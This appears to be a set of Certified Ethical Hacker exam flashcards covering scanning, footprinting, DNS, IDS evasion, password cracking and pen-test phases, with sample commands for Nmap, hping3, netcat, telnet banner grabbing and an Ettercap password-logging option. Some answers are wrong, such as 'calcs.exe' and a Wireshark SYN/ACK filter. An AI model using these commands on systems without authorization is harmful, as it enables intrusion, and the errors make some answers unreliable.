Certified Ethical Hacker
CIA triangle
Confidentiality, integrity, and availability. These are the three aspects of security.
D)Smurf attack
Disabling directed broadcasts on all routers is a mitigation for which attack? A)MAC flood B)SYN flood C)Routing table poisoning D)Smurf attack
No
Does the PNZ hold users?
TCP/UDP 53
Domain Name System (DNS) Zone Transfer
boot record
GrayFish injects its malicious code into the ___ which handles the launching of Windows at each step
Source host
Hostname of the primary DNS server for the zone (there should be an associated NS record for this as well).
social engineering attacks
IP geolocation lookup tools such as IP2Location helps to collect IP geolocation information about the target that helps the attackers to launch ___ such as spamming and phishing
Echo Reply
ICMP Type 0
Time Exceeded
ICMP Type 11
Destination Unreachable
ICMP Type 3
Source Quench
ICMP Type 4
klibc-horsepill.patch horsepill_setopt horsepill_infect
Horse Pill has three important parts
IP2Location IP Location Finder IP Address Geographical Location Finder IP Location GeoIP Lookup Tool Geo IP Tool
IP Geolocation Lookup Tools
IP Identification Number TCP Flow Control Method
IP Spoofing Detection Technigques
Linkedin.com Pipl.com
Personal information--like residential address and phone of employees can be found where?
Phishing takes place using ____
TCP/UDP 389
Lightweight Directory Access Protocol (LDAP)
IP identification field TCP acknowledgement number TCP initial sequence number
TCP fields where data can be hidden are as follow:
distribute the payload covert channels
TCP parameters can be used by the attacker to ___ and to create ___
List Scan
This type of scan simply generates and prints a list of IPs/Names without actually pinging them
HTTP (TCP)
Port number 80
Scan result when a port is open (TCP Connect / Full Open Scan)
SYN --> <-- SYN + ACK ACK --> RST -->
SYN/FIN Scanning (IP Fragments)
SYN/FIN (Small IP Fragments) + Port (n) ---> <--- RST (if port is closed)
SRV
Service records
TCP/UDP 5060, 5061
Session Initiation Protocol (SIP)
monitor everything
Spytech SpyAgent allows you to ___ users do on your computer
Reconnaissance Scanning Gaining Access Maintaining Access Clearing Tracks
What are the five Hacking Phases?
Identify Security Objectives Application Overview Decompose Application Identify Threats Identify Vulnerabilities
What are the five sections of "threat modeling"?
Electronic Transaction and Code Sets Privacy Rule Security Rule National Identifier Requirements Enforcement
What are the five subsections of HIPAA
preparation assessment conclusion
What are the three main phases of Pen Testing?
1) telnet www.certifiedhacker.com 80 (press Enter) 2) GET / HTTP/1.0 (press ENTER twice)
What command is used for Banner Grabbing using Telnet?
arp -d * or netsh interface ip delete arpcache
What commands on a Windows machine will clear the ARP cache?
Trojan
What is a common method of covertly installing a bot or a handler on a client computer?
Script kiddie
What is a derogatory term for a hacker who used other people's programs to attack networks and deface websites?
Low-level software that hides backdoor processes
What is a rootkit?
Rogue access point
What is an unauthorized access point called?
Session reconstruction
What is the process called when an IDS reassembles small packets before performing expression matching?
Applicaiton -- Layer 7 Presentation -- Layer 6 Sesstion -- Layer 5
What layers of the OSI model does the PDU Data reside at?
C) It sets the home network as 202.78.55.6/24
What of the following is true regarding the Snort configuration file shown here: var HOME_NET 202.78.55.6/24 A) This rule configures Snort to alert on traffic from 202.78.55.6/24 B) This rule configures Snort to alert on traffic to 202.78.55.6/24 C) It sets the home network as 202.78.55.6/24 D) None of the above
Dictionary attack
What password cracking method uses an input list or file to discover the password?
Hybrid attack
What password cracking method uses word lists in combination with numbers and special characters?
Zenmap (Nmap's GUI Windows version)
What tool can be used to perform ping sweeps (ICMP Echo scanning)?
Dig (BIND 9)
What tool is native to Unix systems but available as a download for Windows systems, to test a DNS query and reports the results.
Mirroring
What tool type allows you to download an entire website onto the local system
D)Potential impact of the loss for each device
When IDS alerts report attacks on multiple devices, on which basis should the alerts be prioritized? A)Total number of alerts for each device B)Relative cost of each device C)Order in which they are recorded D)Potential impact of the loss for each device
It takes the prescribed action and stops evaluating the packet
When a router is examining a packet against an access control list and finds a traffic match, what action does the router take?
netsh advfirewall firewall show rule name=all
Which Windows Server 2012 command displays all rules within Windows Firewall?
Ethical hacker
Which kind of hacker only hacks for defensive purposes, so that he can think like a potential attacker?
A. APNIC
Your client's business is headquartered in Japan. Which regional registry would be the best place to look for footprinting information? A. APNIC B. RIPE C. ASIANIC D. ARIN E. LACNIC
Qualys FreeScan
for testing websites and applications for OWASP top risks and malware.
SEF (http://spl0it.org/projects/sef.html)
has great tools that can automate things such as extracting e-mail addresses out of websites and general preparation for social engineering. Also has ties into Metasploit payloads for easy phishing attacks.
Dumpster Diving
is looking for treasure in someone else's trash
PsInfo
list information about a system
script kiddie
unskilled, using other's scripts and tools
B. EDGAR Database
Which of the following is a good footprinting tool for discovering information on a publicly traded company's founding, history, and financial status? A. SpiderFoot B. EDGAR Database C. Sam Spade D. Pipl.com
A) Smartcard authentication
Which of the following is a mechanism associated with mandatory access control? A) Smartcard authentication B) User education C) Security policy D) Sign-in register
Session splicing
Which type of attack splits the attack payload into many small packets?
A. Implementing a split-horizon operation B. Restricting zone transfers
Brad is auditing an organization and is asked to provide suggestions on improving DNS security. Which of the following would be valid options to recommend? (Choose all that apply.) A. Implementing a split-horizon operation B. Restricting zone transfers C. Obfuscating DNS by using the same server for other applications and functions D. Blocking all access to the server on port 53
MAC flooding
Bob is attempting to sniff a wired network in his first pen test contract. He sees only traffic from the segment he is connected to. What can Bob do to gather all switch traffic?
Software used and its version Operating system used Sub-directories and parameters Filename, path, database field name, or query Scripting platform Contact details and CMS details
Browsing the target website may provide what kind of information?
OS Vulnerabilities
Buffer overflow vulnerabilities, bugs in operating system, unpatched operating system, etc.
Application Level Attacks
Buffer overflow, cross-site scripting, SQL injection, man-in-the-middle, session hijacking, denial-of-service, etc
True
Botnets are software applications that run automatic tasks over the Internet and often are coordinated to perform DDoS attacks? True or False
B. $207.50
Brad has done some research and determined a certain set of systems on his network fail once every ten years. The purchase price for each of these systems is $1200. Additionally, Brad discovers the administrators on staff, who earn $50 an hour, estimate five hours to replace a machine. Five employees, earning $25 an hour, depend on each system and will be completely unproductive while it is down. If you were to ask Brad for an ALE on these devices, what should he answer with? A. $2075 B. $207.50 C. $120 D. $1200
Active Banner Grabbing
-Specially crafted packets are sent to remote OS and the responses are noted -The responses are then compared with a database to determine the OS -Response from different OSes varies due to differences in TCP/IP stack implementation
Parallel, normal speed scan
-T3
Parallel, fast scan
-T4
XML output
-oX
DNS scan (list scan)
-sL
NULL scan
-sN
Protocol scan
-sO
Ping scan
-sP
RPC scan
-sR
Windows scan
-sW
Hping2 / Hping3
1) Command line network scanning and packet crafting tool for the TCP/IP protocol 2) It can be used for network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stacks auditing, etc.
MarketWatch The Wall Street Transcript Alexa Euromonitor Experian SEC Info The Search Monitor
Competitive Intelligence - What Are the Company's Plans? What websites?
ABI/INFORM Global SimilarWeb AttentionMeter Copernic Tracker SEMRush
Competitive Intelligence - What Expert Opinions Say About the Company? What websites?
D. Cease testing immediately and contact authorities.
During an assessment, your pen test team discovers child porn on a system. Which of the following is the appropriate response? A. Continue testing and report findings at out-brieg B. Continue testing but report findings to the business owners. C. Cease testing immediately and refuse to continue work for the client. D. Cease testing immediately and contact authorities.
A)To ensure critical data is not changed on the system
During security testing, what is the purpose of analyzing the interrupts within a piece of software? A)To ensure critical data is not changed on the system B)To test the access controls C)To validate the design D)To determine if secure coding principles were followed
HINFO
Host information record includes CPU type and OS
Redirect
ICMP Type 5
Echo Request
ICMP Type 8
Banner Grabbing Tools
ID Serve Netcraft Netcat Telnet
-Send SYN + ACK packet to the zombie machine to probe its IPID number -Every packet on the Internet has a fragment identification number (IPID), which increases every time a host sends IP packet -Zombie not expecting a SYN + ACK packet will send RST packet, disclosing the IPID -Analyze the RST packet from zombie machine to extract IPID
IDLE Scan: Step 1
-Send SYN packet to the target machine (port 80) spoofing the IP address of the "zombie" -If the port is open, the target will send SYN+ACK packet to the zombie and in response zombie sends RST to the target -If the port is closed, the target will send RST to the "zombie" but zombie will not send anything back
IDLE Scan: Step 2
-Probe "zombie" IPID again
IDLE Scan: Step 3
Prudent Policy
It provides maximum security while allowing known but necessary dangers. It blocks all services and only safe/necessary services are enabled individually; everything is logged
ISO/IEC 27001:2013
It provides requirements for creating, maintaining, and improving organizational IS (Information Security) systems.
Reduce Focus Area
It reduces attacker's focus area to specific range of IP address, networks, domain names, remote access, etc.
SSH
Jennifer is a system administrator who is researching a technology that will secure network traffic from potential sniffing by unauthorized machines. Jennifer is not concerned with the future impact on legitimate troubleshooting. What technology can Jennifer implement
tcpdump -w capture.log
Jenny is using tcpdump to capture traffic on her network. She would like to save the capture for later review. What command can she use?
A reverse ARP requests maps to two host
MAC spoofing applies a legitimate MAC address to an unauthenticated host, which allows the attacker to pose as a valid user. Based on your understanding of ARP, what would indicate a bogus client?
directory structure
Mirroring an entire website onto the local system enables an attacker to browse website offline; it also assists in finding ___ and other valuable information from the mirrored copy without multiple requests to web server
directory structure
Mirroring an entire website onto the local system enables an attacker to browse website offline; it also assists in finding ____ and other valuable information from the mirrored copy without multiple requests to web server.
illegal access
Misconfiguration vulnerabilities affect web servers, application platforms, databases, networks, or frameworks that may result in _____ or possible owning of the system
IPv4/IPv6 domain names
NetScan Tools Pro lists ____ addresses, hostnames, _____, email addresses, and URLs automatically or with manual tools
map of the target network
Network range information assists attackers to create a ______
intelligence gathering
Network scanning is one of the components of ___ an attacker uses to create a profile of the target organization
Information gathering Sniffing and eavesdropping Spoofing Session hijacking and Man-in-the-Middle attack DNS and ARP Poisoning Password-based attacks Denial-of-Service attack Compromised-key attack Firewall and IDS attacks
Network threats
TCP/IP nodes and routes
NetworkView discover _____ using DNS, SNMP, ports, NetBIOS, and WMI
DIG DNSWatch myDNSTools DomainTools Professional Toolset DNS Query Utility DNS Records DNS Lookup DNSData View DNS Query Utility
DNS Interrogation Tools
http://www.dnsstuff.com http://network-tools.com
DNS Interrogation Tools
Zone transfers
DNS port 53 TCP is used by what?
Name lookups
DNS port 53 UDP is used by what?
creates a back channel
DNS tunneling ___ to access a remote server and applications
port 53 (TCP and UDP)
DNS uses what port?
B)It detects which computers are online.
During a recent review of the events on your company's network, you discover that an attacker used Nmap to perform a ping sweep on your company's network. Which statement is true regarding this type of scan? A)It checks for open UDP ports. B)It detects which computers are online. C)It determines IP trust-based relationships between hosts. D)It sets the FIN, URG and PUSH flags in the TCP header.
Does not work on IPv6
Does NetBIOS name resolution work on IPv6?
No does not work
Does an XMAS scan work against Microsoft Windows?
(TTL) open
Doing ACK flag probe using the TTL version if the RST packet is less then 64 the port is ___.
(Window) open
Doing ACK flag probe using the Window version if the RST packet has anything other than zero, the port is ___.
(Full Connect) SYN/ACK RST
Doing a Full connect open ports respond with ___ and closed ports will respond with a ___.
(Stealth) SYN/ACK RST
Doing a Stealth connect open ports respond with ___ and closed ports respond with ____.
The value of the next sequence number in the packet being acknowledged or replied to
During a TCP handshake, which value is used for the acknowledgement number in a reply packet?
RST
During a Xmas tree scan what indicates a port is closed?
C)External interface of DMZ firewall
During a penetration test, a tester conducts the following scan: hping3 -A 209.15.13.134 -p 80 You receive back no response, indicating the port is filtered. Which type of network interface is being scanned? A)Internal interface of DMZ firewall B)Internal interface of public web server C)External interface of DMZ firewall D)External interface of public web server
A)IT security analyst
During a risk assessment, which of the following roles is responsible for providing the security architecture to the risk assessor? A)IT security analyst B)Business manager C)Facilities manager D)CIO
D)30 hosts in 8 subnets
You are performing a ping sweep to determine the live hosts running in network 204.17.5.0/27. How many possible hosts will be pinged? A)14 hosts in 16 subnets B)126 hosts in 2 subnets C)62 hosts in 4 subnets D)30 hosts in 8 subnets E)254 hosts in 1 subnet
A)N-tier
You have a front-end web server, an application server, and a database server that each perform a single and unique role in a group. What BEST describes this architecture? A)N-tier B)Service oriented architecture C)Separation of duties D)Dual control
Agentless auditing Compliance checks Content audits Customized reporting High-speed vulnerability discovery In-depth assessments Mobile device audits Patch management integration Scan policy design and execution
What are some features of Nessus?
-Network topology discovery and mapping -Export network diagrams to Visio -Network mappings for regulatory compliance -Multi-level network discovery -Auto-detect changes to network topology
What are some features of Network Topology Mapper?
Network vulnerabilities Open ports and running services Application and services vulnerabilities Application and services configuration errors
What are some things that Vulnerability Scanning checks for?
Website-Watcher Change Detection Follow That Page Page2RSS Watch That Page Check4Change OnWebChange Infominder TrackedContent Websnitcher Update Scanner
What are some tools for Monitoring Web Updates?
Google Earth Google Maps Wikimapia National Geographic Maps Yahoo Maps Bing Maps
What are some tools for finding the geographical location?
SiteDigger (www.mcafee.com) MetaGoofil (www.edge-security.com)
What are some tools to make Google hacking more powerful?
C)Automated vulnerability assessment tool
What is Nessus? A)Hacking tool that targets Web servers B)Security scanner that discovers hosts and services on a computer network C)Automated vulnerability assessment tool D)Wireless network detector, sniffer, and intrusion detection system
nmap -P cert.org/24 152.148.0.0/16
What is a nmap command for ICMP Echo Scanning
A way to reveal vulnerabilities
What is a vulnerability scan designed to provide to those executing it?
Identify a user
What is an SID used to do?
A)Covert channel
What is an illegitimate transfer of information between processes on a system or systems on a network? A)Covert channel B)Out of band C)API D)Privilege escalation
C. A UDP port scan of ports 1-1024 on a single address
What is being attempted with the following command? nc -u -v -w2 192.168.1.100 1-1024 A. A full connect scan on ports 1-1024 for a single address B. A full connect scan on ports 1-1024 for a subnet C. A UDP port scan of ports 1-1024 on a single address D. A UDP scan of ports 1-1024 on a subnet
Target of evaluation (TOE)
What is being tested.
Frames
What is built in the Data Link Layer?
Trojan horse attack
What is it called when an attacker attempts to steal passwords through an innocent looking application?
Each header is field is 16 bits in length Source Port - Destination Port Length - Checksum Data
What is the UDP datagram structure?
172.17.255.255
What is the broadcast address in the 172.17.0.0/16 network?
telnet <website name> 80
What is the command to retrieve header information from a web server using Telnet?
B)2048 bits
What is the current recommended RSA key length for a PKI? A)8192 bits B)2048 bits C)4096 bits D)1024 bits
Network, software or service available outside of normal internet traffic and search engines
What is the darknet?
An egg
What is the data payload called when ADMutate is in use?
get proper authorization
What is the first step in Pen Testing?
Footprinting
What is the first step in information gathering and provides a high-level blueprint of the target system or network.
A)Protect you when you are off the LAN
What is the main advantage of a host-based Intrusion Detection/Protection System (IDS/IPS) over a network-based solution? A)Protect you when you are off the LAN B)Requires port scanning C)Requires less training D)Resides at the perimeter of the network
Heap
What is the name for dynamic memory space that, unlike the stack, doesn't rely on sequential ordering or organization?
Netcat
What is the name of a simple UNIX utility that reads and writes data across network connections using either TCP or UDP?
Open Web Application Security Project (OWASP)
What is the name of the online community dedicated to web application security, known for their top 10 list of web vulnerabilities?
Scanning
What is the next step after footprinting a target?
B) The ethical hacker has authorization to proceed from the target owner
What is the primary difference between an ethical hacker and a cracker? A) The ethical hacker points out vulnerabilities but does not exploit them B) The ethical hacker has authorization to proceed from the target owner C) The ethical hacker does not use the same tools and techniques D) The ethical hacker does not have financial motivation
Hashing
What is the process of deriving a value that can be used to determine if any changes have been made in a message called?
A)It takes a message of arbitrary length as input and produces a 128-bit hash value output.
What is the purpose of MD5? A)It takes a message of arbitrary length as input and produces a 128-bit hash value output. B)It takes a message of up to 1 MB in size and produces a 128-bit hash value output. C)It takes a message of up to 1 MB is size and produces a 160-bit hash value output. D)It takes a message of arbitrary length as input and produces a 160-bit hash value output.
It evaluates how well a company adheres to its stated security policy
What is the purpose of a security audit?
It validates their correct application
What is the purpose of conducting security assessments on network resources?
To verify that files have not been changed or altered
What is the purpose of integrity hashes?
C)To automate SQL injection attacks
What is the purpose of using the Mole tool? A)To extract (reverse engineer) data points from a graph B)To read and write data across network connections C)To automate SQL injection attacks D)To recover passwords in a Windows system
C. SYN/ACK
What is the second step in the TCP thee-way handshake? A. SYN B. ACK C. SYN/ACK D. ACK-SYN E. FIN
nslookup [-options] {hostname | [server]}
What is the syntax for nslookup?
N-tier
What is the term for a design with a front-end server, an application server, and a database server that as a group perform a single and unique role?
Threat agent
What is the term for a person who attempts to exploit a threat?
False positive
What is the term for a system incorrectly preventing traffic or actions that should be allowed?
Mantrap
What is the term for a two-door system with a small room between them which allows for visual verification of each person entering a building?
Threat
What is the term for a vulnerability that exists that has the potential to be exploited, as compared to a vulnerability that exists but has no chance of being exploited?
Vulnerability
What is the term for a weakness or error that can lead to a compromise?
Covert channel
What is the term for any method used to bypass multi-level security solutions?
OSSTMM (Open Source Security Testing Methodology Manual)
What is the widely-adopted, peer-reviewed manual for operational security testing and analysis?
U.S. Computer Security Incident Response Team (CSIRT)
What organization acts as a single point of contact for reporting security incidents in the US?
gaining access phase
What phase of ethical hacking is when true attacks are leveled against the targets enumerated.
maintaining access
What phase of ethical hacking makes use of Trojans, rootkits, or any number of other methods.
gaining access
What phase of ethical hacking would you deliver a buffer overflow or SQL injection against a web application.
scanning and enumeration phase
What phase of ethical hacking would you do a ping sweep, network mapper, or a vulnerability scanner.
covering tracks
What phase of ethical hacking, attackers attempt to conceal their success and avoid detection by security professionals.
maintaining access phase
What phase of ethical hacking, hackers attempt to ensure they have a way back into the machine or system they've already compromised.
Regional Internet Registries (RIRs)
What provides overall management of the public IP address space within a given geographic region?
Upgrade the kernel immediately
What should you do when no known workarounds exists to eliminate a Linux kernel vulnerability?
ARP poisoning
What technique funnels all traffic back to a single client, allowing sniffing from all connected hosts?
Outside affiliate
What threat type is a non-trusted individual who uses open access to gain access to an organization's resources?
Insider affiliate
What threat type is a spouse, friend, or even client of an employee who uses the employee's credentials to gain access?
Pure insider
What threat type is an employee with all the rights and access associated with being employed by the company?
Encryption, integrity, and non-repudiation
What three protections does public key cryptography provide?
Absorb Add more services Shut down services
What three ways can you handle a DDoS attack?
CyberGhost
What tool allows you to protect your online privacy, surf anonymously, and access blocked or censored content It hides your IP and replaces it with one of your choice, allowing you to surf anonymously
TOR
What tool allows you to protect your privacy and defend yourself against network surveillance and traffic analysis
GFI LanGuard
What tool assists in asset inventory, change management, risk analysis, and proving compliance?
Website Watcher (http://aignes.com)
What tool can be used to check web pages for changes, automatically notifying you when there's an update?
Colasoft's Packet Builder
What tool can be used to craft segments and manipulate flags? This tool can also create fragmented packets to bypass IDS (and possibly firewalls)?
Netcraft http://www.netcraft.com
What tool can you use to find a company's restricted URLs?
ARIN
What tool can you use to find network ranges for a target and/or contact information?
whois
What tool can you use to queries registries and return information such as: including domain ownership, address, locations, and phone numbers?
OpenStego
What tool can: Data Hiding-It can hide any data within a cover file (e.g. images) Watermarking-Watermarking files (e.g. Images) with an invisible signature. It can be used to detect unauthorized file copying
Shodan
What tool is designed to help you find specific types of computers (routers, servers, and so on) connected to the Internet?
The next sequence number and acknowledgment number in an exchange
What two values must a hacker guess or estimate to highjack a TCP session?
ARP poisoning
What type of attack changes the IP address to MAC address mappings on two other devices, such that the two devices send frames to the attacker when they think they are sending frames to one another?
Brute force password attack
What type of attack is mitigated by an account lockout policy?
Denial of Service (DoS)
What type of attack overwhelms a target with requests that utilize all resources on the target?
Social engineering
What type of attack uses nontechnical means to obtain information useful in a network attack?
Two-factor or multi-factor authentication
What type of authentication is being performed when a USB token and retina scan are both required?
Circuit level gateway
What type of firewall monitors the TCP handshake between packets to determine whether a requested session is legitimate?
Personal firewall software
What type of software is Zonealarm?
An automatic SQL Injection exploitation tool
What type of tool is Mole?
SNMPv3
What version of SNMP encrypts the community strings?
SNMPv1
What version of SNMP is the strings sent in clear text?
Microsoft Baseline Security Analyzer (MBSA)
What vulnerability tool is specifically designed to locate potential exploits in the products from Microsoft?
Domain Name System Security Extensions (DNSSEC)
What was created to protect against DNS poisoning?
Truth in Caller ID Act
What was started in 2010 and states a person who knowingly transmits misleading caller ID information can be hit with a $10,000 fine per incident?
WEP
What wireless protocol has been compromised because of the way it implements the RC4 algorithm?
Telnet request to port 80 on a machine
What would the below output represent? C:\telnet 192.168.1.15 80HTTP/1.1 400 Bad Request Server: Microsoft - IIS/5.0 Date: Sat, 29 Jan 2011 11:14:19 GMT Content - Type: text/html Content - Length: 87 <html><head><title>Error</title></head> <body>The parameter is incorrect. <body><html> Connection to host lost.
To disguise the attack signature for the purpose of evading a signature based IDS
What would you use the tool ADMutate for?
Intranet Zone
What zone is Controlled zone with no heavy restrictions?
Internet DMZ
What zone is Controlled, as it provides a buffer between internal networks and internet?
Production Network Zone
What zone is Restricted zone, as it strictly controls direct access from uncontrolled networks?
Management Network Zone
What zone is Secured zone with strict polices?
Internet Zone
What zone is Uncontrolled, as it is outside the boundaries of an organization?
It continues to examine the packet after a match is found to identify any additional rules the packet might match.
When an IDS or IPS is examining a packet against an access control list and finds a traffic match, what action does the device take?
Closed Open
When doing an IDLE scan if the IPID increments by 1 then the port is ____. If the IPID increments by 2 then the port is _____.
Employee details Organization's website Company directory Location details Address and phone numbers Comments in HTML source code Security policies implemented Web server links relevant to the organization Background of the organization News articles Press releases
When footprinting what organization's information is collected?
User and group names System banners Routing tables SNMP information System architecture Remote system type System names Passwords
When footprinting what system information is collected?
Domain name Internal domain names Network blocks IP addresses of the reachable systems Rogue websites/private websites TCP and UDP services running Access control mechanisms and ACL's Networking protocols VPN Points IDSes running Analog/digital telephone numbers Authentication mechanisms System enumeration
When footprinting what type of Network information is collected?
B)Ignore the risk
When handling residual risk, which of the following is NOT an acceptable approach? A)Apply additional controls B)Ignore the risk C)Transfer the risk D)Accept the risk
spoofed address attacker's real address
When someone uses IP spoofing, the victim replies to the address, it goes back to the _____ and not to the _____
Keywords
When talking to a victim, using ____ can make an attack easier.
SNMP GET SNMP SET
When the SNMP management station asks a device for information, the packet is known as an ____. When it asks the agent to make a configuration change, the request is an ____ request.
D)Encrypt with the server's public key
When the client is creating a session key for an SSL connection, how does the client handle the resulting key? A)Encrypt with the client's public key B)Encrypt with the server's private key C)Encrypt with the client's private key D)Encrypt with the server's public key
D)Scanned port is not filtered
When you are performing ACK flag scanning, what does it mean if you receive a response of RST? A)Scanned port is open B)Scanned port is closed C)Scanned port is filtered D)Scanned port is not filtered
C:\Windows\System32\Config\SAM
Where are the passwords for the SIDs and RIDs located on Windows machines?
Market Watch The Wall Street Transcript Lipper Marketplace Euromonitor Experian SEC Info The Search Monitor
Where can you go to find: What are the company's plans? to use for competitive intelligence.
ABI/INFORM Global Compete Pro AttentionMeter Copernic Tracker Jobitorial SEMRush
Where can you go to find: What expert opinions say about the company? to use for competitive intelligence.
EDGAR Database Hoovers LexisNexis Business Wite
Where can you go to find: When did this company begin? How did it develop? to use for competitive intelligence.
D) c:\windows\system32\config\
Where is the SAM file located in Windows 7? A) c:\system32\ B) c:\system32\config\ C) c:\windows\system32\ D) c:\windows\system32\config\
C. EIP
Which CPU register points to the next command the CPU should execute? A. TDM B. NIL C. EIP D. EDI E. EBP
Protection profile
Which Common Criteria component defines a standard set of security requirements for a specific type of product?
Evaluation Assurance Level (EAL)
Which Common Criteria component defines how thoroughly the product is tested?
D) NS
Which DNS record type indicates the organization's DNS servers dedicated to answering requests? A) PTR B) SOA C) MX D) NS
C) MX
Which DNS record type indicates the organization's e-mail server? A) PTR B) SOA C) MX D) DX
C. A
Which DNS record type maps an IP address to a hostname and is used most often for DNS lookups? A. NS B. MX C. A D. SOA
Land
Which DoS attack sends traffic to the target with a spoofed IP of the target itself? Land Smurf Teardrop SYN flood
D. allintitle:SQL version
Which Google hack would display all pages that have the words SQL and Version in their title? A. inurl:SQL inurl:version B. allinurl:SQL version C. intitle:SQL inurl:version D. allintitle:SQL version
D) allintitle: SQL version
Which Google hack would display all pages that have words "SQL" and "Version" in their titles? A) inurl: SQL inurl: version B) allinurl: SQL version C) intitle: SQL inurl: version D) allintitle: SQL version
Type 11
Which ICMP message type/code indicates the packet could not arrive at the recipient due to exceeding its time to live? A. Type 11 B. Type 3, Code 1 C. Type 0 D. Type 8
C)Session reconstruction
Which IDS technique helps to mitigate session splicing attacks? A)Expression matching B)Session fragmentation C)Session reconstruction D)Whitelisting
802.2
Which IEEE standard describes Logical Link Control (LLC)?
802.1Q
Which IEEE standard describes VLAN encapsulation?
802.11
Which IEEE standard describes Wireless Fidelity (WiFi)?
802.1x
Which IEEE standard describes authentication?
127.0.0.1 or the loopback address
Which IP address does a computer use to refer to itself?
B)27006
Which ISO 27000 standard describes audits and certifications? A)27001 B)27006 C)27002 D)27005
showmount
Which Linux enumeration command displays all the shared directories on the machine
rpcinfo rpcclient
Which Linux enumeration command provides information on RPC in the environment.
finger
Which Linux enumeration command provides information on the user and host machine?
-sO
Which Nmap switch includes protocols in the output?
-sT
Which Nmap switch performs a normal connect scan?
-sS
Which Nmap switch performs a normal stealth scan?
-sP
Which Nmap switch performs a ping scan?
-sX
Which Nmap switch performs an inverse Xmas scan?
B) FIN
Which TCP flag brings communications to an orderly close? A) ACK B) FIN C) PSH D) SYN E) RST
B. PSH
Which TCP flag instructs the recipient to ignore buffering constraints and immediately send all data? A. URG B. PSH C. RST D. BUF
calcs.exe
Which Windows command line tool can be used to assign, display, or modify ACLs (Access Control Lists) to files or folders?
calcs.exe
Which Windows command line tool can be used to assign, display, or modify ACLs (access control lists) to files or folders?
ip.addr == 192.168.1.1
Which Wireshark filter displays only traffic from 192.168.1.1?
Diffie-Hellman
Which algorithm uses a shared private key to exchange public keys?
DNS poisoning
Which attack is based on changing the IP address to host name mapping?
C)TCP session hijacking
Which attack occurs at the Transport layer of the OSI model? A)ICMP flooding B)Telnet DoS attack C)TCP session hijacking D)MAC spoofing
DDoS attacks
Which attack uses a multitude of infected computers known as zombies or bots?
D)Trojan malware
Which attack vector commonly uses covert channels? A)Spear phishing B)SQL injection C)Network sniffing D)Trojan malware
Replay attacks
Which attacks can be mitigated by time stamps and nonce?
A) CACLS.exe
Which command can be used to assign, display, or modify the file and folder ACLs? A) CACLS.exe B) FPORT.exe C) CLACS.exe D) PERM.exe
A) CACLS.exe
Which command can be used to assign, display, or modify the folder ACLs? A) CACLS.exe B) FPORT.exe C) CLACS.exe D) PERM.exe
A. ./snort -dev -l ./log
Which command puts Snort into packet logger mode? A. ./snort -dev -l ./log B. ./snort -v C. ./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf D. None of the above
Switched Port Analyzer (SPAN) feature
Which configuration on a switch sends all traffic to the port on which the IDS is located?
D)Circuit level gateway
Which device normally operates at Layer 5 of the OSI model? A)Packet filtering firewall B)Proxy server C)Switch D)Circuit level gateway
C)Firewalls
Which device uses rule-based access control? A)Servers B)Clients C)Firewalls D)Switches
NTFS
Which file system is susceptible to an attack that uses alternative data streams?
B) tcp.flags==0x18
Which filter should be used to show all SYN/ACK packets? A) tcp.flags==0x02 B) tcp.flags==0x18 C) tcp.flags==0x12 D) tcp.flags==0x10
D) Traceroute
Which footprinting tool uses ICMP to provide information on pathways between senders and recipients? A) Whois B) EDGAR C) NMAP D) Traceroute
The impact on performance
Which impact needs to be considered before implementing a security audit?
Common Criteria
Which international standard establishes a baseline of confidence in the security functionality of IT products, and includes protection profiles and evaluation assurance levels?
23
Which is the port number used for Telnet?
C)Does not require managing server services
Which is true of PGP? A)Requires a licensing fee B)Provides a server-side scripting language C)Does not require managing server services D)Provides only privacy for data
A virus is malware A virus replicates with user interaction
Which is/are a characteristic of a virus?
Client's private key
Which key is required to decrypt a message encrypted by a client's public key?
Server's public key
Which key is required to decrypt a message that was encrypted with a server's private key?
Grey hat
Which kind of hacker believes in full disclosure, with or without permission?
White hat
Which kind of hacker hacks with permission?
Black hat
Which kind of hacker hacks without permission?
A)Single factor authentication
Which kind of security mechanism would require a retina scan and a fingerprint scan as logon credentials? A)Single factor authentication B)Multi-factor authentication C)Two-factor authentication D)Biometric authorization
C)FC-0 D)FC-1
Which layers of the Fibre Channel stack are replaced with Ethernet when using FCoE? (Choose all that apply.) A)FC-4 B)FC-3 C)FC-0 D)FC-1 E)FC-2
Switch
Which network device can block sniffing to a single network collision domain, create VLANs, and make use of SPAN ports and port mirroring?
D. TOE
Which of the following Common Criteria processes refers to the system or product being tested? A. ST B. PP C. EAL D. TOE
B)Hidden SSID E)MAC address filters
Which of the following WLAN security measures could be easily defeated with the use of a wireless sniffer? (Choose all that apply.) A)802.11i B)Hidden SSID C)EAP-TTLS D)WPA2 Enterprise E)MAC address filters
C) ip.addr=192.168.0.100 and tcp.flags.syn
Which of the following Wireshark filters is valid for three way handshake details originating from 192.168.0.100? A) ip==192.168.0.100 and tcp.syn B) ip.addr=192.168.0.100 and syn=1 C) ip.addr=192.168.0.100 and tcp.flags.syn D) ip.equals 192.168.0.100 and syn.equals on
A) Detach from the console and log all collected passwords to a file
Which of the following accurately describes the intent of the command Ettercap -NCLzs --quiet A) Detach from the console and log all collected passwords to a file B) Provide a list of all hosts on the subnet C) Begin a ping sweep D) Provide a list of all listening ports and who is connected to your machine
D)Notifies of threats based on active attack signatures
Which of the following action does vulnerability scanning NOT perform? A)Scans for open ports and running services B)Utilizes automated processes to gather information C)Operates proactively to locate issues D)Notifies of threats based on active attack signatures
B)Sending FTP traffic through a firewall that blocks ports 20 and 21
Which of the following actions becomes possible using HTTP tunneling? A)Determining the open ports on server B)Sending FTP traffic through a firewall that blocks ports 20 and 21 C)Identifying a hidden SSID D)Stealing a secure cookie from a web session
Netcraft (Banner Grabbing)
Reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site
This flag is set during initial communication
SYN (Synchronize)
Port is closed (Stealth Scan [Half-open scan])
SYN --> <-- RST
Scan result when a port is closed (TCP Connect / Full Open Scan)
SYN --> <-- RST
Port is open (Stealth Scan [Half-open scan])
SYN --> <-- SYN + ACK RST -->
TCP Session Establishment (Three-way Handshake)
SYN --> <-- SYN+ACK ACK -->
IDLE Scan: Step 2 (Port Open)
SYN Packet to port 80 spoofing zombie IP address --> (target) (zombie) <-- SYN+ACK packet RST Packet (IPID=31338) --> (target)
B. Assessment
Sally is a member of a pen test team newly hired to test a bank's security. She begins searching for IP addresses the bank may own by searching public records on the Internet. She also looks up news articles and job postings to discover information that may be valuable. What phase of the pen test is Sally working? A. Preparation B. Assessment C. Conclusion D. Reconnaissance
